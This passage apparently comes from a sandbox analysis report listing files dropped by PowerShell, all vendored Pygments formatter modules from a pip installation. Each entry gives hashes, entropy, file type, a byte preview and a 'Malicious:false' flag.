                                                                                                    Preview:........=.Cf.........................f.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d...Z.d...Z.d...Z.d...f.d...Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z ..G.d...d.e.........Z!..G.d...d.e.........Z"e.e.e.e.e e!e"e.d...Z#y.).z.. pygments.filters. ~~~~~~~~~~~~~~~~.. Module containing filter lookup functions and default. filters... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...String..Comment..Keyword..Name..Error..Whitespace..string_to_tokentype)...Filter)...get_list_opt..get_int_opt..get_bool_opt..get_choice_opt..ClassNotFound..OptionError)...find_plugin_filtersc.....................\.....|.t.........v.r.t.........|.....S.t.................D.]...\...}.}.|.|.k(..s...|.c...S...y.).z2Lookup a filter by name. Return None if not
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4178
                                                                                                    Entropy (8bit):4.486813538347638
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YpHGIEg/jcBmgwGvCt798i2m7DtfC9ykwMWleXyQBD:87w88i2Etf5NKy2
                                                                                                    MD5:3F62A4A5E7ABBF52681F7B46CC465322
                                                                                                    SHA1:2FF27F2B5A03AD1018882E6303BF8BF39CEFB6B6
                                                                                                    SHA-256:27D38BF615CB24A664EE6A1480AC298D6F4735FE16949160FE8FFE67F4BFB536
                                                                                                    SHA-512:C8CABE60100DBBDF22B0A172CE02FDBC01FED3354C363627001528086E98F4DA23040A9107EB95330EC759ED8CDDE8EE0F316A70BAF45CAC344BF6A9E5611B27
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatter. ~~~~~~~~~~~~~~~~~~.. Base formatter class... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import codecs..from pip._vendor.pygments.util import get_bool_opt.from pip._vendor.pygments.styles import get_style_by_name..__all__ = ['Formatter']...def _lookup_style(style):. if isinstance(style, str):. return get_style_by_name(style). return style...class Formatter:. """. Converts a token stream to text... Formatters should have attributes to help selecting them. These. are similar to the corresponding :class:`~pygments.lexer.Lexer`. attributes... .. autoattribute:: name. :no-value:.. .. autoattribute:: aliases. :no-value:.. .. autoattribute:: filenames. :no-value:.. You can pass options as keyword arguments to the constructor.. All formatters accept these basic options:.. ``style``. The style to use, can be a string
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5424
                                                                                                    Entropy (8bit):4.59109295075211
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:YBfHDbvQt81zSRZk1pHl88YSuLLd+BFX/f9gIEd0zKmmd+ueISQZwTNu:2ZzSRy3FySA+FvamCSXu
                                                                                                    MD5:64EB306A20C0A8FC578C8680565823D1
                                                                                                    SHA1:15ADB89D224CA7E4D293CFF1AE2C6B0B29C7C198
                                                                                                    SHA-256:FF180071D14AAF440D63087F8BDF0053D86F7CFDD7DB0024844945711445DD4A
                                                                                                    SHA-512:4E36DB75BEC47E857227414F96FB7DE281626839AAD2F5581666E447E46629CCC3710506566FC721C31CDDCCEC1484045230AAE89984B293D04DDA1CC4EDB599
                                                                                                    Malicious:false
                                                                                                    Preview:""". pygments.formatters. ~~~~~~~~~~~~~~~~~~~.. Pygments formatters... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re.import sys.import types.import fnmatch.from os.path import basename..from pip._vendor.pygments.formatters._mapping import FORMATTERS.from pip._vendor.pygments.plugin import find_plugin_formatters.from pip._vendor.pygments.util import ClassNotFound..__all__ = ['get_formatter_by_name', 'get_formatter_for_filename',. 'get_all_formatters', 'load_formatter_from_file'] + list(FORMATTERS).._formatter_cache = {} # classes by name._pattern_cache = {}...def _fn_matches(fn, glob):. """Return whether the supplied file name fn matches pattern filename.""". if glob not in _pattern_cache:. pattern = _pattern_cache[glob] = re.compile(fnmatch.translate(glob)). return pattern.match(fn). return _pattern_cache[glob].match(fn)...def _load_formatters(module_name):.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6937
                                                                                                    Entropy (8bit):5.524165383214288
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:sd0rBfNaf8m7+okhfOtIKJ1mIPYsMbAA0LLd+B0G47JnU9gIEd0KzQ7T2QkNEmmj:y8myqtZoXtW+qJnDM7T2bN3CaOw+
                                                                                                    MD5:1BDDAD084BCA154CC2648F7A7363D846
                                                                                                    SHA1:A0FA48089FD83382ED6C6E2CCFCB0051159AB53C
                                                                                                    SHA-256:FD87BC3F5331B110F995C12318A46AE5D363EBB5BC78E5F2C47D7F1FC53A03DA
                                                                                                    SHA-512:A0CA2F5F80339D1F86DC8934B7C6A5711CDD38F6300AB4CC235B6F1838E253D025AE8BF7BF7425E53052E390DEAE204FC30302FD3C116467BDDF867D0EE7E7B9
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf0.........................v.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d.....e.e.........z...Z.i.Z.i.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d...Z...G.d...d.e.j0..........................Z.e.j4..................e.....Z...e.e.........Z.e.j<..................j?..................e.j<............................e.e.j4..................e.<...e.`.e.`.e.`.e.`.y.).z.. pygments.formatters. ~~~~~~~~~~~~~~~~~~~.. Pygments formatters... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...basename)...FORMATTERS)...find_plugin_formatters)...ClassNotFound)...get_formatter_by_name..get_formatter_for_filename..get_all_formatters..load_formatter_from_filec...........................|.t.........v.rBt.........j...................t.........j...................|.................x.}.t.........|.<...|.j...................|.........S.t.........|.....j...................|..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4226
                                                                                                    Entropy (8bit):5.4522149107056705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:7dCj0uAjP5CsEGJVd5rdhOsq56zLr8X3VZJKXXSt+F8OPt:0yfHgTmFFdPt
                                                                                                    MD5:D4F209313ADD0DD74910809C705BDCA1
                                                                                                    SHA1:F458D6E5419CE1990E91AA3422339189CEDC2551
                                                                                                    SHA-256:3D7A18A1A25E563CB57A209F6D158CBE5A4F81D5333436FE3242275D82DE0FA7
                                                                                                    SHA-512:9634CEDA6A3DF16223C6ABC533A7F6B8F5FA0B5ADD670F8A92A57F45BEB037DA531AD95D916DB475C934D3558CA77CF507B09A1C96782481B060E7AEA7FE2AA8
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfP.........................v.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..d"d#i...Z.y$)%..BBCodeFormatter).z.pygments.formatters.bbcode..BBCode)...bbcode..bb..z.Format tokens with BBcodes. These formatting codes are used by many bulletin boards, so you can highlight your sourcecode with pygments before posting it there...BmpImageFormatter)...pygments.formatters.img..img_bmp)...bmp..bitmap).z.*.bmpzwCreate a bitmap image from source code. This uses the Python Imaging Library to generate a pixmap from the source code...GifImageFormatter).r......img_gif)...gif).z.*.gifztCreate a GIF image from source code. This uses the Python Imaging Library to generate a pixmap from the source code...GroffFormatter).z.pygments.formatters.groff..groff).r......troff..roffr....zFFormat tokens with groff escapes to change their color and font style...HtmlFormatter).z.pygments.formatters.html..HTML)...html).z.*.htmlz.*.htmz.Format toke
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4205
                                                                                                    Entropy (8bit):5.578203261042943
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:IhxSRvak0bBcWT+pHt3kQ7RbUqqlHIpv9Oo8CQ:hakMBcWKz3whKVO8Q
                                                                                                    MD5:B88F13B40746BBE3705F4E3D9AD0D71E
                                                                                                    SHA1:EB0A3AE8BE07460A1DAD5092B6791E961FC87848
                                                                                                    SHA-256:A4F152815B20E65A04CDAD047DCD3138EA58E2EB65B0D456CAFE548B1BEED630
                                                                                                    SHA-512:B156F2E0B487E540095402AA41826E76BE294345AC92907F0F41A367A163CAE3039BAE15D371EE70D4A59B70C5230258E507B64AE3212CA8CD10B1F8E98E3CAC
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................<.....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.g.Z...G.d...d.e.........Z.y.).z.. pygments.formatters.bbcode. ~~~~~~~~~~~~~~~~~~~~~~~~~~.. BBcode formatter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)...get_bool_opt..BBCodeFormatterc.....................2.....e.Z.d.Z.d.Z.d.Z.d.d.g.Z.g.Z.d...Z.d...Z.d...Z.y.).r....a..... Format tokens with BBcodes. These formatting codes are used by many. bulletin boards, so you can highlight your sourcecode with pygments before. posting it there... This formatter has no support for background colors and borders, as there. are no common BBcode tags for that... Some board systems (e.g. phpBB) don't support colors in their [code] tag,. so you can't use the highlighting together with that tag.. Text in a [code] tag usually is shown with a monospace font (which this. formatter can do with the ``monofont``
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7275
                                                                                                    Entropy (8bit):5.376463514500946
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:yahj6bB18eu+BFvxHZ2gvSxO0bjFHRkNN1sVV2lNRv3W/VCI4VzXf1GYwB6o9O5d:yEmB1//BF5ogK00bd7R4VzXfKB6+O5d
                                                                                                    MD5:A04D0681E7551F622A436346DC3D7D1B
                                                                                                    SHA1:BC7DE733F44025554F076E377F6B85B03A802146
                                                                                                    SHA-256:3FE5D84C0C3D7D9299BCE07C654508F2212D145F4E14BED22CF14803944F2639
                                                                                                    SHA-512:A40D7500D5D243DFBA2DE8B70B351397F1585C34A505D7472CC46A96DC18BB5424C9271A4E2F2DE30AB5590FBAF6F1CE5E780D055464D6557BA429F32489DABD
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................H.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.g.Z...G.d...d.e.........Z.y.).z.. pygments.formatters.groff. ~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for groff output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...Formatter)...get_bool_opt..get_int_opt..GroffFormatterc.....................J.....e.Z.d.Z.d.Z.d.Z.g.d...Z.g.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).r....a..... Format tokens with groff escapes to change their color and font style... .. versionadded:: 2.11.. Additional options accepted:.. `style`. The style to use, can be a string or a Style subclass (default:. ``'default'``)... `monospaced`. If set to true, monospace font will be used (default: ``true``)... `linenos`. If set to true, print the line numbers (default: ``false``)... `wrap`. Wrap lines to the specified number of characters. Disa
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):40583
                                                                                                    Entropy (8bit):5.603253973790322
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:2f5FhEEBGxIFiME72GTonhrlVuPaOF0D8EHg3YaovU/gwUvPlOfvGzjfV29dvqGj:ahp0Iiz2/nhCaIV3/oecyqG64
                                                                                                    MD5:6E9341A55E19D946BEEF6339D409C0B7
                                                                                                    SHA1:C2826DF959F37CDD77677F0B507B8ECF5B2CBFA3
                                                                                                    SHA-256:796A4F38D5AEAE0747EBBC88F4D773D2A48C59924173E5A7F6581271408B3D36
                                                                                                    SHA-512:FFB8EA1F60CF38CFC4A79443A595F5971D04F52848D23D04A691A7D1B474B7BCF702D4DA5633291ADB53DB67CDF20DC10A47DF72C43B0FA3F65529488DB714E3
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.....d.d.l.Z.d.g.Z...e.d.........d...e.d.........d...e.d.........d...e.d.........d...e.d.........d.i.Z.e.f.d...Z.d...Z.d...Z.d.Z.d.e.z...d.z...Z.d.Z.d.Z...G.d...d.e.........Z.y.#.e.$.r...d.Z.Y..[w.x.Y.w.).z.. pygments.formatters.html. ~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for HTML output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...StringIO)...Formatter)...Token..Text..STANDARD_TYPES)...get_bool_opt..get_int_opt..get_list_opt..HtmlFormatter..&z.&amp;..<z.&lt;..>z.&gt;.."z.&quot;..'z.&#39;c.....................$.....|.j...................|.........S.).z<Escape &, <, > as well as single and double quotes for HTML.)...translate)...text..tables.... .pC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/formatters/html.py.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):27054
                                                                                                    Entropy (8bit):5.368295559597716
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:DiWDVW1jqsbTTFr25tzbypikv68RqoALWm:z49qexCOFBqoAim
                                                                                                    MD5:195C76416EEA4E169F5A322E77E6A859
                                                                                                    SHA1:DCBB72A2BF9F5C3B902DCB86BDB9955B95F01436
                                                                                                    SHA-256:FBA2DC62F0644A7BE74211278CFBD1802DC65B39898E1EDD8494B3A73E358F6D
                                                                                                    SHA-512:85C7319B8D55BB59D6967DC7031A6EFA29DE2551B91FAC52102D19D80E5C4950307BE92F61B243843C3562FE6E5492DF88305B39ADFA45A7803CE17125F01DC2
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.U.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.Z...d.d.l.m.Z.m.Z.m.Z...d.Z...d.d.l.Z.g.d...Z.g.d...d.d.g.d.g.d.d.g.d...Z.d.Z.d.Z.d.Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d e.........Z.y.#.e.$.r...d.Z.Y..sw.x.Y.w.#.e.$.r.....d.d.l.Z.n.#.e.$.r...d.Z.Y.n.w.x.Y.w.Y...w.x.Y.w.)!z.. pygments.formatters.img. ~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for Pixmap output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...Formatter)...get_bool_opt..get_int_opt..get_list_opt..get_choice_opt)...Image..ImageDraw..ImageFontTF)...ImageFormatter..GifImageFormatter..JpgImageFormatter..BmpImageFormatter).....Roman..Book..Normal..Regular..Medium..Oblique..Italic..Boldz.Bold Obliquez.Bold Italic)...NORMAL..ITALIC..BOLD..BOLDITALICz.DejaVu Sans Monoz.Courier New..Menloc....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6076
                                                                                                    Entropy (8bit):5.626337188338668
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Rx2XvFaQMcJCrlleCzxGW+39K+vG/c38lanaJr49v9Ok+kz/XLy+4OEOdNve0cl:Rxm7k8o+39K+u/dcaJM9VOe/+BOr2Jl
                                                                                                    MD5:2D900A810F79A11D702DE4547BA73377
                                                                                                    SHA1:699834D930523033A35092327061697025F2EB2C
                                                                                                    SHA-256:C507DDFF49F71063DB4ABCBE08F2B2445977E744B37DEE8A40FA0E04B4580B95
                                                                                                    SHA-512:7253B6776B2176C73A778665D1638C2DAB89CF3F6CC4FF854BB0E08A6720E6D86433C8EABF4F1198AA53804DDD65922BC0EC0DA3A147A724BBBF0905E142D825
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cfu...............................d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.g.Z.i.e.d...e.d...e.d...e.j"..................d...e.d...e.j$..................d...e.j&..................d...e.j(..................d...e.j*..................d...e.j,..................d...e.j...................d...e.j0..................d...e.j2..................d...e.j4..................d...e.j6..................d...e.j8..................d...e.j:..................d...e.d.e.d.e.j<..................d.e.j>..................d.e.j@..................d.e.jB..................d.e.j...................d.e.d.i...Z"i.d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d$..d&d'..d(d)..d*d)..d+d,..d-d...d/d...d0d1..d2d3..d4d5d.....Z#d6..Z$..G.d7..d.e.........Z%y8)9z.. pygments.formatters.irc. ~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for IRC output.. :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19965
                                                                                                    Entropy (8bit):5.670901284929988
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:w44YYRRO4YF/oB/ltm2QDDCNA0DhGmD0aJxTQRhB8jqdX800sLeinPtfT:eO4AoBNgDWNA0HIafQRz8jqdj0VinPt7
                                                                                                    MD5:5AFB38C49F1BB7EDD96BEBD85AA488C5
                                                                                                    SHA1:ADEFAD8FD255CD66DF5BB238B40EE7CA8CD1EE9D
                                                                                                    SHA-256:42C99AF5D90FFB06B0B3C09677F8BF25C87441720F58F22EDAC98A22A8A5DD31
                                                                                                    SHA-512:6CF01AEB5C49BA67DFBC74B8EBAE92533B678E64FAE49A0DC980B62B5219AC4A1FBAC51ECCAB9FBEAFA389082A96D8DAAB9F299E309A0DDE4C398BFA9F1C1D58
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf.K.............................d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.g.Z.d...Z.d.Z.d.Z.d...Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).z.. pygments.formatters.latex. ~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for LaTeX fancyvrb output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...StringIO)...Formatter)...Lexer..do_insertions)...Token..STANDARD_TYPES)...get_bool_opt..get_int_opt..LatexFormatterc..........................|.j...................d.d.........j...................d.d.........j...................d.d.........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6895
                                                                                                    Entropy (8bit):5.407219820629323
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4gcIysUOJ3M14OxB2VWVAWj3smmqvDg7yu:4gcIfUMEXxYVWVAWDmqvc7yu
                                                                                                    MD5:2B63DEDC4670BFA61CB07658130E9EBF
                                                                                                    SHA1:418A43ABADE8CEE8079F00A33840781D964F2161
                                                                                                    SHA-256:899526B7EBC930804395A79DA75AE285A3C9A81BDB21304229C10499D258275A
                                                                                                    SHA-512:611CF5219F05463872B91DB43EBF19A634056334B210F8131BDD6CA6B8150250683A2EBD5D091C2EB8EFCE3264AE4BD73D01FC3BE1CBA18996E3C2FAF9AB0A53
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf...............................d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z...G.d...d.e.........Z...G.d...d.e.........Z.d.Z.d.Z...G.d...d.e.........Z.y.).z.. pygments.formatters.other. ~~~~~~~~~~~~~~~~~~~~~~~~~.. Other formatters: NullFormatter, RawTokenFormatter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)...get_choice_opt)...Token)...colorize)...NullFormatter..RawTokenFormatter..TestcaseFormatterc.....................(.....e.Z.d.Z.d.Z.d.Z.d.d.g.Z.d.g.Z.d...Z.y.).r....z;. Output the text unchanged without any formatting.. z.Text only..text..nullz.*.txtc..........................|.j...................}.|.D.]9..\...}.}.|.r!|.j...................|.j...................|....................)|.j...................|............;..y...N)...encoding..write..encode)...self..tokensource..outfile..enc..ttype..values.... .qC:\Users\boadi\AppData\Local\Program
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2941
                                                                                                    Entropy (8bit):5.73040802598811
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:TYa8WGtP+55h7q/DfoBHFop0+5N6/u80849rK9P0b4Y+9I:LdM+xqcfw5Nn249O9P0b4DI
                                                                                                    MD5:D19B56A0C954F43C2341671A994657D9
                                                                                                    SHA1:F82B419FC00BA8308D19BE24B81CACB8FA8DC37C
                                                                                                    SHA-256:B0C0C02B3E3AA4A087A6F3D059760B790B3767A466BD2DD5A3298288FBADEAE9
                                                                                                    SHA-512:19920AE01219FC415F1B95FF127EBA41C7AFA00D53550E955D0CAD2A52349E6029C5ED41E2DE1618679AB91A0C581785019F74EF86441655C29D57B1E3B620EB
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................^.....d.Z.d.d.l.m.Z...d.g.Z...e.d.........d...e.d.........d.i.Z.e.f.d...Z...G.d...d.e.........Z.y.).z.. pygments.formatters.pangomarkup. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for Pango markup output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter..PangoMarkupFormatter..&z.&amp;..<z.&lt;c.....................$.....|.j...................|.........S.).z Escape & and < for Pango Markup.)...translate)...text..tables.... .wC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/formatters/pangomarkup.py..escape_special_charsr........s..........>.>.%.. .. .....c.....................,.....e.Z.d.Z.d.Z.d.Z.d.d.g.Z.g.Z.d...Z.d...Z.y.).r....zk. Format tokens as Pango Markup code. It can then be rendered to an SVG... .. versionadded:: 2.9. z.Pango Markup..pango..pangomarkupc...........................t.........j.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6137
                                                                                                    Entropy (8bit):5.51340915179446
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:BEFFytmsO7DspbB2lya6jIk+IS7KgIvsRusJDJwNtwXxdO4Who+49Oy8B:BEupO7IBB27YIJISegIvs1XO45OZ
                                                                                                    MD5:390FFE943C886B4DBDC0EA900BC3BB37
                                                                                                    SHA1:4AD1DCB7E08115FBA6843A9DA4CBB30FACB049EC
                                                                                                    SHA-256:A12659ADDE8AFF36BE468564EF0B7BCC646BDDB9C30580B855092D16AB0130C4
                                                                                                    SHA-512:2FA9CDBE04D91CCEFC4733E6CBC86E31C73493FB33399F56AAF4FD88A1C3E7A27A4B39F0B3111093D7147E2C965E5F110297C49F721027B45AF1283484FDBDB2
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................@.....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.g.Z...G.d...d.e.........Z.y.).z.. pygments.formatters.rtf. ~~~~~~~~~~~~~~~~~~~~~~~.. A formatter that generates RTF files... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)...get_int_opt..surrogatepair..RtfFormatterc.....................8.....e.Z.d.Z.d.Z.d.Z.d.g.Z.d.g.Z.d...Z.d...Z.d...Z.d...Z.y.).r....a..... Format tokens as RTF markup. This formatter automatically outputs full RTF. documents with color information and other useful stuff. Perfect for Copy and. Paste into Microsoft(R) Word(R) documents... Please note that ``encoding`` and ``outencoding`` options are ignored.. The RTF format is ASCII natively, but handles unicode characters correctly. thanks to escape sequences... .. versionadded:: 0.6.. Additional options accepted:.. `style`. The style to use, can be a string or a S
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9077
                                                                                                    Entropy (8bit):5.5717018035463255
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:nLpHUoqWLfpqnpjzjgaoFDXtjrEDThEHOSa37s4jnTAVOvc:nlHUoqQpejzxmt3+EH2Y4eF
                                                                                                    MD5:652CFB04B4DF7A3B0D585FA2C728C863
                                                                                                    SHA1:A2F47A1308BBF8F4A6D66CA6F15EAABBBE1A3BDC
                                                                                                    SHA-256:CCD6242EFBE7D6EB8092383B5C2BAC568A355C0E2899271A76F4DDE2FE130CE2
                                                                                                    SHA-512:405584866905EBE3232AFF4026CEB8483A2ACDFC205667725FAD17F8913B780C3FD309BB82269095AE379500E222E7CE2E3B1C13D5967320EEEF002D798E51A2
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................V.....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.g.Z.d...Z.i.Z...G.d...d.e.........Z.y.).z.. pygments.formatters.svg. ~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for SVG output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)...Comment)...get_bool_opt..get_int_opt..SvgFormatterc..........................|.j...................d.d.........j...................d.d.........j...................d.d.........j...................d.d.........j...................d.d.........S.).z<Escape &, <, > as well as single and double quotes for HTML...&z.&amp;..<z.&lt;..>z.&gt;.."z.&quot;..'z.&#39;)...replace)...texts.... .oC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/formatters/svg.py..escape_htmlr........sE.........<.<...W..%........V..$........V..$........X..&........W..%....&.....c.....................2.....e.Z.d.Z.d.Z.d.Z.d.g.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5840
                                                                                                    Entropy (8bit):5.468930184126338
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:VJHe+FajECwfjJClv1vGEQ0+t33biKBUV/Kr/9OZ0XLyvMfqimu:VJHhOEnNm1u35pBe/KrlOZ0+umu
                                                                                                    MD5:9F71909228A923435DA89BF3E527F848
                                                                                                    SHA1:FC63A0F64ADB53276DD417E99D208607C771548F
                                                                                                    SHA-256:49D461406A85D26DC2AB4B9B0AE7B11C59DFE485EA51388320DCB87C6AA6C15B
                                                                                                    SHA-512:EE2762F4E4649D2F9C2B72BF39B3A90219170A136CA70BE3FD24D383AFE5BF79434AB9EF850DE441989D741BA10EC692A9425058476C0D50BD2B7D2F8E7960AB
                                                                                                    Malicious:false
                                                                                                    Preview:........=.CfB..............................d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.i.e.d...e.d...e.d...e.j&..................d...e.d...e.j(..................d...e.j*..................d...e.j,..................d...e.j...................d...e.j0..................d...e.j2..................d...e.j4..................d...e.j6..................d...e.j8..................d...e.j:..................d...e.j<..................d...e.j>..................d...e.d.e.d.e.j@..................d.e.jB..................d.e.jD..................d.e.jF..................d.e.jH..................d.e.j...................d.e.d.i...Z%..G.d...d.e.........Z&y.).z.. pygments.formatters.terminal. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for terminal output with ANSI sequences... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)...Keyword..Name..Comment..String..Error..Number..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15168
                                                                                                    Entropy (8bit):5.139387807731162
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:cIOtlZXjDwBUBE5MrL0JKRVMX0BK2gq/w3:c5lZXj0BUGy0JKTMEBU4w3
                                                                                                    MD5:AE3FDE27792B8C9DE6F84555A7AE42ED
                                                                                                    SHA1:9BC44F51EC97579D0DB4A890D1F0FFFB602226B0
